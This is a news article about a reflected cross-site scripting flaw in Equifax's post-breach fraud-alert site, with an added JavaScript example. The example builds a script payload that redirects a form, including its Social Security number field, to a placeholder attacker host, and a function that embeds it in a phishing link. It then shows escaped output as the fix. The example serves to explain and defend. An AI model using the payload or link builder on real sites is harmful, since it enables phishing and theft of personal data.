Equifax's credit report monitoring site is also vulnerable to hacking

The site has at least one vulnerability that allows a hacker to trick users into turning over sensitive data.
Written by Zack Whittaker, Contributor

The XSS vulnerability in action. (Image: ZDNet)

Equifax's site used to set up credit account monitoring in the wake of last week's security breach is also vulnerable to hackers, ZDNet has learned.

In the aftermath of the breach, the going recommendation has been to set up alerts and freezes on any and all credit accounts. Countless consumers are thought to have flocked to the credit rating agencies' websites and phone banks to protect themselves from hackers.

The problem is that the Equifax site used to set up alerts on an individual's credit history (which we are not linking to) can easily be made to display attacker-controlled content, security researcher Martin Hall told ZDNet.


The site is used to request a 90-day fraud or active duty alert for credit report holders -- thought to be the majority of Americans.

But a vulnerability in the site can allow hackers to siphon off the personal information of anyone who reaches it through an attacker-supplied link.

The site is vulnerable to a cross-site scripting (XSS) attack, in which an attacker gets their own script to run in a victim's browser under the identity of a legitimate website or web application, such as Equifax's site.

In this case, a hacker can trick a user into loading the site from a malicious link that carries the attacker's code in the web address. The page then prompts for the consumer's social security number and other personal information.

That data could be sent to the attacker as soon as it is submitted.

Because the malicious code travels in Equifax's own web address and is reflected back into the page, the malicious prompt runs within the Equifax domain. The connection is still encrypted, so the browser still displays the "lock" icon in the address bar, even though the lock only vouches for the connection, not for the content of the page. That also makes the attack difficult to spot in a spam or phishing email, because the link points at, and the code is loaded from, Equifax's legitimate domain.

Anyone with knowledge of the code can use it in phishing emails to trick unaware consumers into turning over personal information to an attacker -- even though the link and the page appear to be Equifax's domain.

"I looked at the code and noticed that I could break out of the developer's code into my own," said Hall. "This gives me full permission to change the page to say or load any content I want."

"Do you trust Equifax with your details? The problem is that post breach they are asking people to enter their personal details all over again while they still have many insecure sites and pages," he said.

Hall said that he reached out to Equifax's security team about several flaws across the company's site but didn't hear back.

Troy Hunt, a security expert who runs the data breach notification site Have I Been Pwned, told ZDNet that it was "alarming" that the flaw existed in the first place, but, "even more alarming that the researcher hasn't been able to get a response when attempting to report it."

Cross site scripting, he said, "enables an attacker to run their own arbitrary JavaScript in a victim's browser which gives them an enormous amount of control over how a vulnerable website behaves."

"They can rewrite the page, change where forms post data to (consequently grabbing any information entered into the page), load external content into the browser and even deliver malware to the victim," said Hunt.
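The attack the article describes (attacker code carried in the URL, reflected into the page, and the form repointed so that submitted data goes to the attacker, as Hunt outlines above), as an added example that is not part of the original article and is not Equifax's or the researchers' code. It models a server-rendered fraud-alert form in Node.js, with the vulnerable rendering beside a hardened one. The form fields, the "ref" query parameter, the example hostnames and the payload are all assumptions made for illustration.

```javascript
// Added example, not code from Equifax or from the researchers quoted in the
// article: a minimal model of a reflected XSS in a server-rendered fraud-alert
// form, beside a hardened version. The form fields, the "ref" query parameter
// and the attacker host are assumptions made for illustration.

// Constructed payload: once it executes in the page it rewrites the first form
// so that whatever the visitor submits is posted to the attacker instead.
// "attacker.invalid" is a reserved, non-resolving placeholder domain.
const ATTACKER_HOST = "https://attacker.invalid";
const PAYLOAD =
  `<script>document.forms[0].action="${ATTACKER_HOST}/collect";</script>`;

// Vulnerable rendering: the "ref" parameter is interpolated into the HTML
// exactly as received, so markup in the query string becomes live markup.
function renderFormVulnerable(requestUrl) {
  const ref = new URL(requestUrl).searchParams.get("ref") ?? "";
  return [
    '<form method="POST" action="/fraud-alert/submit">',
    `  <p>Reference: ${ref}</p>`,
    '  <input name="ssn" placeholder="Social Security Number">',
    "  <button>Submit</button>",
    "</form>",
  ].join("\n");
}

// Minimal HTML escaping for text placed between tags or inside quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, but untrusted input is escaped first, so
// the payload is displayed as text rather than executed.
function renderFormHardened(requestUrl) {
  const ref = new URL(requestUrl).searchParams.get("ref") ?? "";
  return [
    '<form method="POST" action="/fraud-alert/submit">',
    `  <p>Reference: ${escapeHtml(ref)}</p>`,
    '  <input name="ssn" placeholder="Social Security Number">',
    "  <button>Submit</button>",
    "</form>",
  ].join("\n");
}

// True if the rendered HTML contains an executable <script> tag.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// The link an attacker would mail out: the payload rides in the query string,
// so the host shown in the address bar is the legitimate site's own.
function craftPhishingLink(legitimateFormUrl) {
  const u = new URL(legitimateFormUrl);
  u.searchParams.set("ref", PAYLOAD);
  return u.toString();
}

// Stand-alone run against a placeholder site: the same link is harmless once
// the output is escaped.
function demo() {
  const link = craftPhishingLink("https://www.example.invalid/fraud-alert");
  return {
    linkHost: new URL(link).host,
    vulnerableHasScript: containsScriptTag(renderFormVulnerable(link)),
    hardenedHasScript: containsScriptTag(renderFormHardened(link)),
  };
}

console.log(demo());
```

The fix is output encoding at the point where untrusted data meets HTML; the address bar, the padlock and the TLS certificate are unchanged in both versions, which is why none of them help the victim here. A Content-Security-Policy that disallows inline script would block this particular payload as a second layer, but it does not replace escaping.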

At least one other XSS security issue has been found. It's not known if hackers are actively exploiting the website vulnerability.

Because the website is vulnerable, we can't recommend breach-affected consumers use the Equifax website to set up alerts or credit freezes for the time being until the security flaw is resolved.

CBS News has a detailed report on what to do if you're affected by the data breach. While we would recommend to call Equifax instead, we can't be sure that customer service representatives aren't using the same website.

An Equifax spokesperson did not return a call or email at the time of writing. If that changes, we'll update.
